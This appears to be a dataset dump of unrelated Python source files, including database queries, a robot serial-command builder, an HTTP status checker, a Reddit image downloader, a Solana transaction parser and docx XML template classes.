async def get_project_analysis_secrets_by_name_and_ref(
project_name: str, branch_name: str, ref_name: str
):
query = select([secret]).where(
secret.c.analysis_id
== (
select([analysis.c.id])
.where(
and_(
project.c.name == project_name,
or_(
analysis.c.branch_name == branch_name,
analysis.c.ref_name == ref_name,
),
)
)
.order_by(analysis.c.execution_date.desc())
.limit(1)
)
)
return await database.fetch_all(query)
async def get_project_analysis_by_name_and_ref(
project_name: str, branch_name: str, ref_name: str
):
query = (
select([analysis.c.id])
.where(
and_(
project.c.name == project_name,
or_(
analysis.c.branch_name == branch_name,
analysis.c.ref_name == ref_name,
),
)
)
.order_by(analysis.c.execution_date.desc())
.limit(1)
)
return await database.fetch_one(query)
async def get_project_by_name(project_name: str):
query = project.select().where(project.c.name == project_name)
return await database.fetch_one(query=query)
async def get_projects():
query = project.select()
return await database.fetch_all(query)
|
986,927 | 2cf0e7c72308c87c7ccb8e69b052f4a083e95963 | from funkyrolodex import FunkyRolodex
import time
start_time = time.time()
parser = FunkyRolodex()
if __name__ == '__main__':
parser.process_entries('sample-shafayet.in')
parser.jsonify('result.out')
print time.time() - start_time, 'seconds'
|
986,928 | aa07a91b6af6aae37940af78409b4050fd903113 | #!/usr/bin/env python
# -*- coding: utf-8 -*
import sys
import rospy
import serial
reload(sys)
sys.setdefaultencoding('utf-8')
ser = serial.Serial('COM0', 38400)
print ser.isOpen()
def send(m_sspeed_x,m_sspeed_y,m_sspeed_w):
checksum = 0x00
m_state = 0x11
m_Estop = 0x00
m_cinstruction=[0,0,0, 0,0,0, 0,0,0, 0,0,0]
m_cinstruction[0] = 0x02
if m_sspeed_x<0:
m_sspeed_x = 65536+m_sspeed_x
m_cinstruction[1:3] = divmod(m_sspeed_x,256)
if m_sspeed_y<0:
m_sspeed_y = 65536+m_sspeed_y
m_cinstruction[3:5] = divmod(m_sspeed_y,256)
if m_sspeed_w<0:
m_sspeed_w = 65536+m_sspeed_w
m_cinstruction[5:7] = divmod(m_sspeed_w,256)
m_cinstruction[7] = m_state#0待机;1行走
m_cinstruction[8] = m_Estop#0正常;1急停
m_cinstruction[9] = 0x55#上位机操作;AA遥控器操作
for i in range(0,10):
checksum ^= m_cinstruction[i]
m_cinstruction[10] = checksum
m_cinstruction[11] =0x03
# print m_cinstruction
return m_cinstruction
if __name__ == '__main__':
print "Reading from keyboard"
print "Use WASD keys to control the robot"
print "Press j to stop"
print "Press q to quit"
|
986,929 | b1529c895264103278c63baab45e52b2c230fb30 | # coding=utf-8
import pandas as pd
from pandas import DataFrame
import matplotlib.pyplot as plt
import numpy as np
import math
def NMI(A,B):
dict1=dict()
dict2=dict()
dict3=dict()
first=DataFrame({"A":A,"B":B})
tmp1=first["A"].groupby([first["A"],first["B"]])
tmp2=first["A"].groupby([first["A"]])
tmp3=first["B"].groupby([first["B"]])
total=len(A)
Hx=0
Hy=0
Ixy=0
for i,j in tmp1:
dict1[i]=float(len(j.values))/total
for i,j in tmp2:
tmp=float(len(j.values))/total
Hx += tmp*-1*math.log(tmp,2)
dict2[i]=tmp
for i,j in tmp3:
tmp=float(len(j.values))/total
Hy += tmp*-1*math.log(tmp,2)
dict3[i]=tmp
for i in dict1.keys():
oppps=float(dict1[i])/(dict2[i[0]]*dict3[i[1]])
Ixy+= dict1[i]*math.log(oppps,2)
nmi=2*Ixy/(Hx+Hy)
return nmi
def read_file_1(file,number1,number2):
dat1=np.genfromtxt(file,skip_header=2, usecols=(1,6))
df = DataFrame(dat1,columns=["frames","dist_%2d_%2d"%(number1,number2)])
mins=df["dist_%2d_%2d"%(number1,number2)].groupby(df["frames"]).min()
return mins
def read_file_2(file):
dat1=np.genfromtxt(file,skip_header=19, usecols=(0,1))
df = DataFrame(dat1,columns=["frames","mindist"])
return df
#col=[]
#################################################################
#for i in xrange(10001):
# col.append("frame_%d"%i)
#mins_2=np.zeros(10001)
#for i in xrange(187,188):
# for j in xrange(135,136):
# mins=read_file("dist_%2d_%2d.data"%(i,j),i,j)
# mins_2=np.vstack((mins_2,mins.values))
#test=DataFrame(mins_2,columns=col)
#test.to_csv("./H_H6.csv")
#for i in xrange(10001):
# print test["frame_%d"%i].sort_values().index[0]
# print test["frame_%d"%i].sort_values().index[1]
# print test["frame_%d"%i].sort_values().index[2]
######################################################################
def get_auto_corr(timeSeries1_pre,timeSeries2_pre,k):
"""
timeSeries is an array
"""
l=len(timeSeries1_pre)
timeSeries1=timeSeries1_pre[0:l-k]
timeSeries2=timeSeries2_pre[k:]
timeSeries1_mean=timeSeries1.mean()
timeSeries2_mean=timeSeries2.mean()
###doubt
timeSeries1_std= np.sqrt(timeSeries1_pre.var()*len(timeSeries1_pre))
timeSeries2_std= np.sqrt(timeSeries2_pre.var()*len(timeSeries2_pre))
auto_corr = 0
for i in xrange(l-k):
if timeSeries1_std == 0 or timeSeries2_std == 0:
return 0
else:
tmp=(timeSeries1[i]-timeSeries1_mean)*(timeSeries2[i]-timeSeries2_mean)/(timeSeries1_std*timeSeries2_std)
auto_corr = auto_corr + tmp
return auto_corr
#####################################################################################
def plot_auto_corr(timeSeries1_pre,timeSeries2_pre,k,number1,number2):
"""
k can not be beyound the length of timeSeries
"""
timeSeriestimeSeries = pd.DataFrame(range(k))
for i in xrange(1,k+1):
timeSeriestimeSeries.loc[i-1] =get_auto_corr(timeSeries1_pre,timeSeries2_pre,i)
plt.bar(range(1,len(timeSeriestimeSeries)+1),timeSeriestimeSeries[0].values)
plt.savefig("./mind_hb_inter_%d_%d.png"%(number1,number2))
plt.show()
mindist= read_file_2("../cap_ALA/mindist_10000_Ala.xvg")
mindist=mindist["mindist"]
for i in xrange(183,195):
for j in xrange(130,182):
mins=read_file_1("./dist_%2d_%2d.data"%(i,j),i,j)
#tmp=df["hbnum_%d_%d"%(i,j)]
nmi=NMI(mindist.values,mins.values)
print i,j,"\t",nmi
############################################################################3
|
986,930 | fa71b49e6d9a79c4df430b40b9a5f8d7a7a5fc2a | #! /usr/bin/env python3
import json
import urllib.request
import pandas as pd
from extractData import *
selectedCountries = ["China",
"Malaysia",
"Australia",
"New Zealand",
# "Italy",
# "Japan",
# "Singapore",
# "Norway",
"South Korea"
# "United Kingdom",
# "United States"
]
dataPool = []
for country in selectedCountries:
countryCode = getCodeDay1Date(country)[0].values[0][0]
day1Date = getCodeDay1Date(country)[1].values[0][0].split("/")
DD = day1Date[0]
MM = day1Date[1]
YYYY = day1Date[2]
if len(MM) == 1:
MM = "0"+MM
if len(DD) == 1:
DD = "0"+DD
# print(DD, MM, YYYY)
dateInput = YYYY + "-" + MM + "-" + DD
print(country, dateInput)
# download raw json object
url = "https://covidtrackerapi.bsg.ox.ac.uk/api/v2/stringency/date-range/"+dateInput+"/2020-05-07"
data = urllib.request.urlopen(url).read().decode()
# parse json object
obj = json.loads(data)
print(obj)
dateData = obj["data"]
dates = list(dateData.keys()) ##Return list of dates
# print(dates)
df = pd.DataFrame(columns=['DaySinceCase100', country])
row = 0
for date in dates:
try:
stringency = dateData[date][countryCode]["stringency_actual"]
# print(stringency)
except:
stringency = ""
pass
df.loc[row] = [row+1, stringency]
row = row + 1
# print(df)
dataPool =+ [df]
print(dataPool)
df.to_csv ('exportStringencyScore.csv', index = False, header=True)
## Ref: https://plotly.com/python/line-charts/
# import plotly.graph_objects as go
# from plotly.subplots import make_subplots
# fig = make_subplots(
# rows=3, cols=2,
# specs=[
# [{}, {}],
# [{}, {}],
# [{"colspan": 2}, None],
# ],
# subplot_titles=countryCodesWanted)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[0]]
# ),
# row=1, col=1)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[1]]
# ),
# row=1, col=2)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[2]]
# ),
# row=2, col=1)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[3]]
# ),
# row=2, col=2)
# fig.add_trace(go.Scatter(
# x=df["date"],
# y=df[countryCodesWanted[4]]
# ),
# row=3, col=1)
# fig.update_yaxes(range=[0, 100])
# fig.update_layout(
# showlegend=False,
# autosize=True,
# height=800,
# title_text="Stringency of each country")
# import dash
# import dash_core_components as dcc
# import dash_html_components as html
# app = dash.Dash()
# app.layout = html.Div([
# dcc.Graph(figure=fig)
# ])
# app.run_server(debug=True)
|
986,931 | 1497db63b47c656df1ff443cc69498e637b082c9 | #!/usr/bin/python
# -*-Python-script-*-
#
#/**
# * Title : http request status code
# * Auther : by Alex, Lee
# * Created : 06-11-2015
# * Modified : 06-18-2015
# * E-mail : cine0831@gmail.com
#**/
import os
import sys
import socket
import time
import threading
import httplib
import optparse
import time
import datetime
start = time.time()
lock = threading.Lock()
def myThread(url,fds, argv):
try:
if argv.proto == 'http':
httpconn = httplib.HTTPConnection(url, argv.port, timeout = 1)
if argv.proto == 'https':
httpconn = httplib.HTTPSConnection(url, argv.port, timeout = 1)
httpconn.connect()
httpconn.request(argv.method, argv.uri)
reqstat = httpconn.getresponse()
lock.acquire()
output = "%4s %s %3s %3s %s%s" % (reqstat.status, reqstat.reason, '', '', url, '\n')
print output,
lock.release()
httpconn.close()
except (httplib.HTTPException, socket.error) as ex:
lock.acquire()
output = " Error %s %20s%s" % (url, ex, '\n')
print output,
lock.release()
fds.writelines(output)
time.sleep(0)
return
def parsing(argv):
proto = ['http','https']
method = ['GET','POST']
cmd = optparse.OptionParser()
cmd.usage = """
%prog -l [filename] -p [port] -P [http | https] -m [GET | POST] -u [uri]
"""
cmd.add_option('-l', action='store', type='string', dest='filename', help='file of server lists')
cmd.add_option('-p', action='store', type='string', dest='port', help='destination port')
cmd.add_option('-P', action='store', type='string', dest='proto', help='http or https')
cmd.add_option('-m', action='store', type='string',dest='method', help='http method GET / POST')
cmd.add_option('-u', action='store', type='string', dest='uri', default='/index.html', help='request uri | ex) /index.html'
)
cmd.add_option('-v', action='store_true', dest='verbose', help='show version and exit')
(options, args) = cmd.parse_args(argv)
if len(args) == 1:
cmd.print_help()
sys.exit()
if options.verbose == 1:
print 'HTTP Code checker ver 0.2'
sys.exit()
if options.proto not in proto:
cmd.print_help()
sys.exit()
if options.method not in method:
cmd.print_help()
sys.exit()
return options
def run(argv):
try:
fd = open (argv.filename)
fd_log = open ('result_log.txt', 'w')
threads = []
for line in fd:
url = line.strip('\n')
th = threading.Thread(target=myThread,args=(url,fd_log,argv))
th.start()
threads.append(th)
for th in threads:
th.join()
fd_log.close
fd.close
except (IOError):
print 'Can not open file'
except (IndexError):
print 'Index Error'
def main():
opt = parsing(sys.argv[1:])
run(opt)
if __name__ == "__main__":
main()
print "Elapsed time: %s" % (time.time() - start)
|
986,932 | 2f56d55f6c1bb846a482a114e9a0034e5354cde8 | n = int(input())
a = list(map(int, input().split()))
z = []
for i in a:
if a.count(i)%2 == 1:
z.append(i)
z.sort()
ans = 0
z.reverse()
for i in range(len(z)-1):
if i%2 == 0:
ans+= z[i] - z[i+1]
print(ans) |
986,933 | f5dffb00919686e58c4c0299daf08dc164a6d2d9 | #!/usr/bin/env python3
from astropy.io import fits
import scipy as sp
import matplotlib.pyplot as plt
from astropy.convolution import convolve, Box1DKernel
class Spectrum:
#a class to read and store information from the .fits files of DR1 spectra
def __init__(self, path):
#takes the file path of the .fits file as an argument
width = 10 #not decided on value yet
hdulist = fits.open(path)
#open the .fits file to allow for data access
self.flux = hdulist[0].data[0] #flux counts of the spectra
self.date = hdulist[0].header['DATE'] #date the observation was made
self.CLASS = hdulist[0].header['CLASS'] #object LAMOST classification
self.smoothFlux = convolve(self.flux,Box1DKernel(width))[5*width:-5*width]
self.desig = hdulist[0].header['DESIG'][7:] #Designation of the object
self.totCounts = sp.sum(self.flux) #Sum the total counts to give a feature
init = hdulist[0].header['COEFF0']
#coeff0 is the centre point of the first point in log10 space
disp = hdulist[0].header['COEFF1']
#coeff1 is the seperation between points in log10 space
self.wavelength = 10**sp.arange(init, init+disp*(len(self.flux)-0.9), disp)[5*width:-5*width]
#use coeff0 and coeff1 to calculate the wavelength of each pixel in angstroms
self.flux = self.flux[5*width: -5*width]
hdulist.close()
#close the .fits file
self.lines = {'Iron':[3800, 3900]}
#elements, and the window in which their emmision lines are seen
self.letters = {"B":[3980,4920], "V":[5070,5950],"R":[5890,7270],"I":[7310,8810]}
#colour bands and their corresponding wavelength windows
self.bands = {"B":0, "V":0, "R":0, "K":0}
#colour bands and the (to be calculated) total counts in that band
for letter in self.letters:
lower = sp.searchsorted(self.wavelength, self.letters[letter][0], side = 'left')
#find the index of the lower boundary of the band
upper = sp.searchsorted(self.wavelength, self.letters[letter][1], side = 'right')
#find the index of the upper boundary of the band
bandFlux = self.smoothFlux[lower:upper]
bandFlux[bandFlux<0] = sp.nan
self.bands[letter] = -2.5*sp.log10(sp.nanmean(bandFlux))
self.BV = self.bands['B'] - self.bands['V']
self.BR = self.bands['B'] - self.bands['R']
self.BI = self.bands['B'] - self.bands['I']
self.VR = self.bands['V'] - self.bands['R']
self.VI = self.bands['V'] - self.bands['I']
self.RI = self.bands['R'] - self.bands['I']
def plotFlux(self, ax = None, Tpred = None, Teff = None, element = None, colour = '#1f77b4', label = None, log = True):
#method to plot the spectra and scaled blackbody curve, and also zoom in on element lines
if not ax: fig, ax = plt.subplots()
ax.plot(self.wavelength,self.flux, color = colour, label = label)
if Tpred:
h = 6.63e-34
c = 3e8
k = 1.38e-23
E = (8*sp.pi*h*c)/((self.wavelength*1e-10)**5*(sp.exp(h*c/((self.wavelength*1e-10)*k*Tpred))-1))
#Calculate an ideal black body curve for a temperature T
fudge = self.totCounts/sp.sum(E)
#normalise blackbody curve by scaling by the total counts ratio of the curve to the spectra
self.bbFlux = fudge*E
#the normalised blackbody curve
ax.plot(self.wavelength,self.bbFlux, ls = '--', label = 'Predicted', color = 'r')
#plot the flux and blackbody curve against wavelength
if Teff:
h = 6.63e-34
c = 3e8
k = 1.38e-23
E = (8*sp.pi*h*c)/((self.wavelength*1e-10)**5*(sp.exp(h*c/((self.wavelength*1e-10)*k*Teff))-1))
#Calculate an ideal black body curve for a temperature T
fudge = self.totCounts/sp.sum(E)
#normalise blackbody curve by scaling by the total counts ratio of the curve to the spectra
self.bbFlux = fudge*E
#the normalised blackbody curve
ax.plot(self.wavelength,self.bbFlux, ls = ':', label = 'Effective', color = 'g')
#plot the flux and blackbody curve against wavelength
if log: ax.set_yscale('log')
if element in self.lines:
#plot inset plot for selected element
ax1 = fig.add_axes([0.6,0.55,0.25,0.25])
ax1.plot(self.wavelength,self.flux)
ax1.set_title(element)
ax1.set_xlim(self.lines[element])
ax1.set_xticks(self.lines[element])
ax1.set_yscale('log')
|
986,934 | 5baa83b4dab007d4227a8593dd25874ceaedd64c | __author__ = 'David Rapoport'
import requests
import os
from urllib2 import urlopen
import json
import datetime
from PIL import Image
from StringIO import StringIO
import sys
import time
import stat
import subprocess
import wx
from sys import argv
reload(sys)
sys.setdefaultencoding('UTF-8')
def fixCWKD():
path =os.getcwd()
path = path[0:3]
path=path+"Users\\David Rapoport\\Desktop"
print path
os.chdir(path)
fixCWKD()
attempts=0
def fixURL(url):
if url.find(".jpg")>=0:
while not url[-4:]==".jpg":
url=url[:-1]
elif url.find(".gif")>=0:
while not url[-4:]==".gif":
url=url[:-1]
elif url.find(".png")>=0:
while not url[-4:]==".png":
url=url[:-1]
else: url=url+".jpg"
return url
def fixCaptions(capt):
capt=capt.replace("\"",'')
capt=capt.replace(":",'')
capt=capt.replace("\\",'')
capt=capt.replace("/",' ')
capt=capt.replace("?",' ')
capt=capt.replace("|",' ')
capt=capt.replace("*",' ')
capt=capt.replace("<",' ')
capt=capt.replace(">",' ')
if(len(capt)>190):capt=capt[:(190-len(capt))]
return capt
today=datetime.datetime.now()
delta = datetime.timedelta(4)
fourAgo= today-delta
fourString = "Reddit's best for "+str(fourAgo.month) + "_" + str(fourAgo.day) + "_" + str(fourAgo.year)
if os.path.exists(fourString):
os.chdir(fourString)
for files in os.listdir("C:\\Users\\David Rapoport\\Desktop\\"+fourString):
if os.path.isdir(files):
os.chdir(files)
for subfiles in os.listdir("C:\\Users\\David Rapoport\\Desktop\\"+fourString+"\\"+files):
os.remove(subfiles)
os.chdir("..")
subprocess.Popen("rmdir " + "\"" + files + "\"", stdout=subprocess.PIPE, shell=True)
else: os.remove(files)
os.chdir("..")
print os.getcwd()
time.sleep(30)
subprocess.Popen("rmdir " + "\"" + fourString + "\"", stdout=subprocess.PIPE, shell=True)
current =str(today.month) + "_" + str(today.day) + "_" + str(today.year)
current = "Reddit's best for "+ current
print os.getcwd()
if( not os.path.exists(current)): os.makedirs(current,stat.S_IWRITE)
os.chdir(current)
print os.getcwd()
while attempts <=5:
try:
passWordFile = open('../redditPassword.txt','r')
password=passWordFile.read()
redditUrl= "http://www.reddit.com/.json"
user_pass_dict ={"api_type": "json", "passwd": password, "rem": True, "user":"drapter4325"}
#remove quotes from password
#login = requests.post(r"http://www.reddit.com/api/login",data=paramaters)
session = requests.session()
session.headers.update({'User-Agent' : 'just doing it for fun \u\drapter4325'})
login = session.post(r'https://ssl.reddit.com/api/login', data=user_pass_dict)
loginjson = json.loads(login.content)
session.modhash=loginjson['json']['data']['modhash']
urlInfo = session.get(redditUrl)
urls = list()
data=urlInfo.json()
captions=list()
#subprocess.call(["echo","eureka"])
for children in data['data']['children']:
test =str(children['data']['url'])
if test.find('imgur.com')>=0:
urls.append(test)
captions.append(str(children['data']['title']))
j=0
for pictureURL in urls:
import urllib
captions[j]=fixCaptions(captions[j])
if pictureURL.find("/a/")>=0 and not os.path.exists(captions[j]):
os.makedirs(captions[j],stat.S_IWRITE)
os.chdir(captions[j])
albumText=urllib.urlopen(pictureURL).read()
album=albumText.split("\n")
albumURL= list()
for lines in album:
if lines.find("View full resolution")>=0:
albumURL.append("http://" + lines[23:46])
k=1
for links in albumURL:
#print links
file=open(str(k)+links[-4:],"wb")
pic= urllib.urlopen(links)
file.write(pic.read())
file.close()
k=k+1
os.chdir("..")
j=j+1
continue
elif not os.path.exists(captions[j]):
pictureURL=fixURL(pictureURL)
print pictureURL
print captions[j] + pictureURL[-4]
file=open(captions[j]+pictureURL[-4:],"wb")
k= urllib.urlopen(pictureURL)
file.write(k.read())
file.close()
j=j+1
else: j=j+1
attempts=6
except Exception as e:
print str(e)
attempts= attempts+1
app=wx.App(False)
frame = wx.Frame(None, wx.ID_ANY, 'error occured')
error = wx.MessageDialog(frame, str(e),"ERROR",wx.ICON_ERROR)
frame.Show(False)
error.ShowModal()
time.sleep(30)
|
986,935 | 82211b8aa766f6752b9f2505c23d1d332454137a | from typing import Optional, List, Tuple
from agoraapi.common.v3 import model_pb2
from agora import solana
from agora.solana import memo, token, system
from .creation import Creation
from .invoice import InvoiceList, Invoice
from .memo import AgoraMemo
from .payment import ReadOnlyPayment
from .transaction_type import TransactionType
def parse_transaction(
tx: solana.Transaction, invoice_list: Optional[model_pb2.InvoiceList] = None
) -> Tuple[List[Creation], List[ReadOnlyPayment]]:
"""Parses payments and creations from a Solana transaction.
:param tx: The transaction.
:param invoice_list: (optional) A protobuf invoice list associated with the transaction.
:return: A Tuple containing a List of :class:`ReadOnlyPayment <agora.model.payment.ReadOnlyPayment>` objects and a
List of :class:`Creation <agora.model.creation.Creation>` objects.
"""
payments = []
creations = []
invoice_hash = None
if invoice_list:
invoice_hash = InvoiceList.from_proto(invoice_list).get_sha_224_hash()
text_memo = None
agora_memo = None
il_ref_count = 0
invoice_transfers = 0
has_earn = False
has_spend = False
has_p2p = False
app_index = 0
app_id = None
i = 0
while i < len(tx.message.instructions):
if _is_memo(tx, i):
decompiled_memo = solana.decompile_memo(tx.message, i)
memo_data = decompiled_memo.data.decode('utf-8')
# Attempt to pull out an app ID or app index from the memo data.
#
# If either are set, then we ensure that it's either the first value for the transaction, or that it's the
# same as a previously parsed one.
#
# Note: if both an app id and app index get parsed, we do not verify that they match to the same app. We
# leave that up to the user of this SDK.
try:
agora_memo = AgoraMemo.from_b64_string(memo_data)
except ValueError:
text_memo = memo_data
if text_memo:
try:
parsed_id = app_id_from_text_memo(text_memo)
except ValueError:
i += 1
continue
if app_id and parsed_id != app_id:
raise ValueError('multiple app IDs')
app_id = parsed_id
i += 1
continue
# From this point on we can assume we have an agora memo
fk = agora_memo.foreign_key()
if invoice_hash and fk[:28] == invoice_hash and fk[28] == 0:
il_ref_count += 1
if 0 < app_index != agora_memo.app_index():
raise ValueError('multiple app indexes')
app_index = agora_memo.app_index()
if agora_memo.tx_type() == TransactionType.EARN:
has_earn = True
elif agora_memo.tx_type() == TransactionType.SPEND:
has_spend = True
elif agora_memo.tx_type() == TransactionType.P2P:
has_p2p = True
elif _is_system(tx, i):
create = system.decompile_create_account(tx.message, i)
if create.owner != token.PROGRAM_KEY:
raise ValueError('System::CreateAccount must assign owner to the SplToken program')
if create.size != token.ACCOUNT_SIZE:
raise ValueError('invalid size in System::CreateAccount')
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::InitializeAccount instruction')
initialize = token.decompile_initialize_account(tx.message, i)
if create.address != initialize.account:
raise ValueError('SplToken::InitializeAccount address does not match System::CreateAccount address')
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::SetAuthority(Close) instruction')
close_authority = token.decompile_set_authority(tx.message, i)
if close_authority.authority_type != token.AuthorityType.CLOSE_ACCOUNT:
raise ValueError('SplToken::SetAuthority must be of type Close following an initialize')
if close_authority.account != create.address:
raise ValueError('SplToken::SetAuthority(Close) authority must be for the created account')
if close_authority.new_authority != create.funder:
raise ValueError('SplToken::SetAuthority has incorrect new authority')
# Changing of the account holder is optional
i += 1
if i == len(tx.message.instructions):
creations.append(Creation(initialize.owner, initialize.account))
break
try:
account_holder = token.decompile_set_authority(tx.message, i)
except ValueError:
creations.append(Creation(initialize.owner, initialize.account))
continue
if account_holder.authority_type != token.AuthorityType.ACCOUNT_HOLDER:
raise ValueError('SplToken::SetAuthority must be of type AccountHolder following a close authority')
if account_holder.account != create.address:
raise ValueError('SplToken::SetAuthority(AccountHolder) must be for the created account')
creations.append(Creation(account_holder.new_authority, initialize.account))
elif _is_spl_assoc(tx, i):
create = token.decompile_create_associated_account(tx.message, i)
i += 1
if i == len(tx.message.instructions):
raise ValueError('missing SplToken::SetAuthority(Close) instruction')
close_authority = token.decompile_set_authority(tx.message, i)
if close_authority.authority_type != token.AuthorityType.CLOSE_ACCOUNT:
raise ValueError('SplToken::SetAuthority must be of type Close following an assoc creation')
if close_authority.account != create.address:
raise ValueError('SplToken::SetAuthority(Close) authority must be for the created account')
if close_authority.new_authority != create.subsidizer:
raise ValueError('SplToken::SetAuthority has incorrect new authority')
creations.append(Creation(create.owner, create.address))
elif _is_spl(tx, i):
cmd = token.get_command(tx.message, i)
if cmd == token.Command.TRANSFER:
transfer = token.decompile_transfer(tx.message, i)
# TODO: maybe don't need this check here?
# Ensure that the transfer doesn't reference the subsidizer
if transfer.owner == tx.message.accounts[0]:
raise ValueError('cannot transfer from a subsidizer-owned account')
inv = None
if agora_memo:
fk = agora_memo.foreign_key()
if invoice_hash and fk[:28] == invoice_hash and fk[28] == 0:
# If the number of parsed transfers matching this invoice is >= the number of invoices,
# raise an error
if invoice_transfers >= len(invoice_list.invoices):
raise ValueError(
f'invoice list doesn\'t have sufficient invoices for this transaction (parsed: {invoice_transfers}, invoices: {len(invoice_list.invoices)})')
inv = invoice_list.invoices[invoice_transfers]
invoice_transfers += 1
payments.append(ReadOnlyPayment(
transfer.source,
transfer.dest,
tx_type=agora_memo.tx_type() if agora_memo else TransactionType.UNKNOWN,
quarks=transfer.amount,
invoice=Invoice.from_proto(inv) if inv else None,
memo=text_memo if text_memo else None
))
elif cmd != token.Command.CLOSE_ACCOUNT:
# closures are valid, but otherwise the instruction is not supported
raise ValueError(f'unsupported instruction at {i}')
else:
raise ValueError(f'unsupported instruction at {i}')
i += 1
if has_earn and (has_spend or has_p2p):
raise ValueError('cannot mix earns with P2P/spends')
if invoice_list and il_ref_count != 1:
raise ValueError(f'invoice list does not match to exactly one memo in the transaction (matched {il_ref_count})')
if invoice_list and len(invoice_list.invoices) != invoice_transfers:
raise ValueError(f'invoice count ({len(invoice_list.invoices)}) does not match number of transfers referencing '
f'the invoice list ({invoice_transfers})')
return creations, payments
def _is_memo(tx: solana.Transaction, index: int) -> bool:
return tx.message.accounts[tx.message.instructions[index].program_index] == memo.PROGRAM_KEY
def _is_spl(tx: solana.Transaction, index: int) -> bool:
return tx.message.accounts[tx.message.instructions[index].program_index] == token.PROGRAM_KEY
def _is_spl_assoc(tx: solana.Transaction, index: int) -> bool:
return tx.message.accounts[tx.message.instructions[index].program_index] == \
token.ASSOCIATED_TOKEN_ACCOUNT_PROGRAM_KEY
def _is_system(tx: solana.transaction, index: int) -> bool:
return tx.message.accounts[tx.message.instructions[index].program_index] == system.PROGRAM_KEY
def app_id_from_text_memo(text_memo: str) -> str:
parts = text_memo.split('-')
if len(parts) < 2:
raise ValueError('no app id in memo')
if parts[0] != "1":
raise ValueError('no app id in memo')
if not is_valid_app_id(parts[1]):
raise ValueError('no valid app id in memo')
return parts[1]
def is_valid_app_id(app_id: str) -> bool:
if len(app_id) < 3 or len(app_id) > 4:
return False
if not app_id.isalnum():
return False
return True
|
986,936 | 268a7b7a594ada5751936ba1ae5e9e9526a7326a | # !/usr/bin/env python
# coding: utf-8
import os
import jinja2
from wildzh.utils import constants
__author__ = 'zhouhenglc'
abs_dir = os.path.abspath(os.path.dirname(__file__))
temp_dir = os.path.join(abs_dir, 'docx_template')
_ENV = jinja2.Environment()
class XmlObj(object):
temp_name = ""
temp_str = None
env = _ENV
def __new__(cls, *args, **kwargs):
if cls.temp_str is None:
temp_path = os.path.join(temp_dir, cls.temp_name)
if not temp_path.endswith('.template'):
temp_path += '.template'
with open(temp_path, encoding=constants.ENCODING) as r:
cls.temp_str = r.read()
return object.__new__(cls)
def __init__(self):
pass
@classmethod
def transfer(cls, s):
_d = ["&", "&", "<", "<", ">", ">", "'", "'",
'"', '"']
for i in range(0, len(_d), 2):
s = s.replace(_d[i], _d[i + 1])
return s
def _to_xml(self, **kwargs):
t = self.env.from_string(self.temp_str)
r = t.render(**kwargs)
return r
def to_xml(self):
return self._to_xml()
class ParagraphXmlObj(XmlObj):
temp_name = 'paragraph'
def __init__(self, runs=None, **kwargs):
"""
outline_level new support 1 2, if add should update word/styles.xml
"""
super().__init__()
self._runs = []
self._outline_level = None
self.runs = runs
self.outline_level = kwargs.get('outline_level', None)
@property
def runs(self):
return self._runs
@runs.setter
def runs(self, runs):
self._runs = []
kwargs = {}
if self.outline_level:
kwargs['font_size'] = None
if isinstance(runs, str):
self._runs.append(RunTextXmlObj(runs, **kwargs))
elif isinstance(runs, (list, tuple)):
for run in runs:
if isinstance(run, dict) and 'url' in run:
self._runs.append(RunImageXmlObj(run))
else:
self._runs.append(RunTextXmlObj(run, **kwargs))
@property
def outline_level(self):
return self._outline_level
@outline_level.setter
def outline_level(self, v):
self._outline_level = v
if self._outline_level:
for run in self.runs:
run.font_size = None
def to_xml(self):
runs = [x.to_xml() for x in self._runs]
kwargs = {'runs': runs, 'outline_level': self.outline_level}
return self._to_xml(**kwargs)
class ParagraphPageXmlObj(XmlObj):
temp_name = 'paragraph_page'
class RunTextXmlObj(XmlObj):
temp_name = 'run_text'
def __init__(self, text, font_size=24):
super().__init__()
self.text = text
self.font_size = font_size
def to_xml(self):
kwargs = {'text': self.transfer(self.text),
'font_size': self.font_size}
return self._to_xml(**kwargs)
class RunImageXmlObj(XmlObj):
temp_name = 'run_image'
def __init__(self, item):
super().__init__()
self.item = item
def to_xml(self):
return self._to_xml(**self.item)
class BlockParent(object):
MODES = []
@classmethod
def subclass(cls):
cs = []
for c in cls.__subclasses__():
cs.append(c)
if hasattr(c, 'subclass'):
cs.extend(c.subclass())
return cs
def __new__(cls, *args, **kwargs):
mode = args[0]
cs = cls.subclass()
new_cls = cls
for c in cs:
if mode in c.MODES:
new_cls = c
break
return super().__new__(new_cls)
def __init__(self, mode, questions, answer_mode):
self.mode = mode
self.answer_mode = answer_mode
self.questions = questions
def _get_alone_answers(self):
return self._get_alone_detail_answers()
def _get_alone_detail_answers(self):
return []
def get_answers(self):
if self.answer_mode == 'alone':
ps = self._get_alone_answers()
else:
ps = self._get_alone_detail_answers()
return [p.to_xml() for p in ps]
class Block(BlockParent):
MODES = [2, 3, 4, 5, ]
def _get_alone_answers(self):
return self._get_alone_detail_answers()
def _get_alone_detail_answers(self):
ss_paragraphs = []
for q_item in self.questions:
if q_item['multi_answer_rich']:
q_item['multi_answer_rich'][0].insert(
0, '%s、' % q_item['this_question_no'])
for ar in q_item['multi_answer_rich']:
ss_paragraphs.append(ParagraphXmlObj(ar))
return ss_paragraphs
class SingleChoiceBlock(Block):
MODES = [1, ]
@staticmethod
def get_right_option(question):
return question['right_option']
def _get_alone_answers(self):
ss_paragraphs = [[]]
ss_item = []
i = 0
for item in self.questions:
item['right_option'] = self.get_right_option(item)
ss_item.append(item)
i += 1
if i % 5 == 0:
rp = '%s-%s %s ' % (
ss_item[0]['this_question_no'],
ss_item[-1]['this_question_no'],
''.join([x['right_option'] for x in ss_item]))
ss_paragraphs[-1].append(rp)
if i % 20 == 0:
ss_paragraphs.append([])
ss_item = []
if ss_item:
rp = '%s-%s %s' % (ss_item[0]['this_question_no'],
ss_item[-1]['this_question_no'],
''.join([x['right_option'] for x in ss_item]))
ss_paragraphs[-1].append(rp)
return [ParagraphXmlObj(p) for p in ss_paragraphs]
def _get_alone_detail_answers(self):
ss_paragraphs = []
for item in self.questions:
right_option = self.get_right_option(item)
pa = '%s.%s' % (item['this_question_no'], right_option)
ss_paragraphs.append(pa)
